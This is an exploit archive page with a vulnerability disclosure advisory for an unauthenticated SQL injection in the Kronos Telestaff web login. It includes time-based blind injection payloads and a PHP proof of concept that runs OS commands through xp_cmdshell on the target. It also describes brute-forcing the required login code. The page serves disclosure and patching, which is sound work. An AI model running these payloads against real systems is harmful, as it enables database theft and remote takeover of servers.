exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Kronos Telestaff SQL Injection

Kronos Telestaff SQL Injection
Posted Jun 5, 2017
Authored by Chris Anastasio, Mark F. Snodgrass

Kronos Telestaff versions prior to 2.92EU29 suffer from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 2026990b4ae0d270b09cc355b15de93ad0be6adf7836f695074b12d159a9b6bb

Kronos Telestaff SQL Injection

Change Mirror Download
Software: Kronos Telestaff Web Application
Version: < 2.92EU29
Homepage: http://www.kronos.com/
CERT VU: VU#958480
CVE: (Pending)
CVSS: 10 (Low; AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-89
Vulnerable Component: Login page

Description
================
The login form is vulnerable to blind SQL injection by an unauthenticated user.


Vulnerabilities
================
The vulnerability is due to the unsanitized POST parameter 'user' in login page:
URL: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POSTDATA=device=stdbrowser&action=doLogin&user=&pwd=&code=

The exploit requires a valid "code" in the post body. However in almost all instances we found on the internet, the "code" POST variable was hard-coded into the page. Furthermore, the "code" POST variable is very often a 4 digit number - and can be easily discovered in ~5000 requests.


Proof of concept
================
PoC 1 - extract data from database
example extract benign data e.g.
Injection Point: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POST data:
device=stdbrowser&action=doLogin&user=')if(DB_NAME()='TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>

compare timing with

device=stdbrowser&action=doLogin&user=')if(DB_NAME()<>'TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>


PoC 2 - Execute Code Remotely
example inject benign code e.g. ping a remote systems

<?php
$cmd_to_execute = strToHex("ping -n 1 receive_ping_host"); // insert you own host here to detect dns lookup and/or ping; or insert other command
$code=XXXX // insert valid code
$target_url= // insert login page url of target system i.e. example.com/webstaff-2.0/servlet/ServletController.asp?device=stdbrowser&action=doLogin&selfhosted=true
$payload="DECLARE @lphda VARCHAR(280);SET @lphda=".$cmd_to_execute.";EXEC master..xp_cmdshell @lphda";
$payload=str_replace(" ","%20",$payload);
$postdata="device=stdbrowser&action=doLogin&user=')".$payload."---&pwd=test&code=".$code;

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, TRUE);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
curl_exec($ch);

function strToHex($string){
$hex = '';
for ($i=0; $i<strlen($string); $i++){
$ord = ord($string[$i]);
$hexCode = dechex($ord);
$hex .= substr('0'.$hexCode, -2);
}
return "0x".strToUpper($hex);
}


Affected Systems
================
From Vendor:
Customers running TeleStaff version 2.x with Self Hosted Web Access, those customers who host their own web access, are affected and Kronos recommends that you upgrade to TeleStaff 2.92EU29 or Workforce TeleStaff.


Solution
================
From Vendor:

Though there is no further action needed after the installation of the update there are a couple of best practices that we suggest to further secure the production environment.
1. We recommend that the Web Staff Middle Tier be locked down to only be accessed from the source addresses. For Self-Hosted Web Access this would be the Internet facing IIS server hosting the Self Hosted WebStaff module. For customers using WebStaff (www.telestaff.net) and PSM (psm.telestaff.net and m.telestaff.net) those are the IP addresses of the Kronos servers.
2. Customers, once configured, should remove the viewDatabases.asp script to avoid accidental information leakage to unauthorized users.


Timeline
================
2015-12-18: Discovered
2016-01-04: Contacted Vendor
2016-01-11: Report sent to vendor
2016-01-20: Received acknowledgement of vulnerable from security contact info at vendor
2016-01-20: Vendor is remediating the issue
2016-10-18: Vendor issues patch
2017-06-01: Public disclosure


Discovered by
================
Chris Anastasio 0x616e6173746173696f [ at ] illumant.com
Mark F. Snodgrass 0x736e6f646772617373 [ at ] illumant.com


About Illumant
================
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks. Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant. For more information, visit https://illumant.com/

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close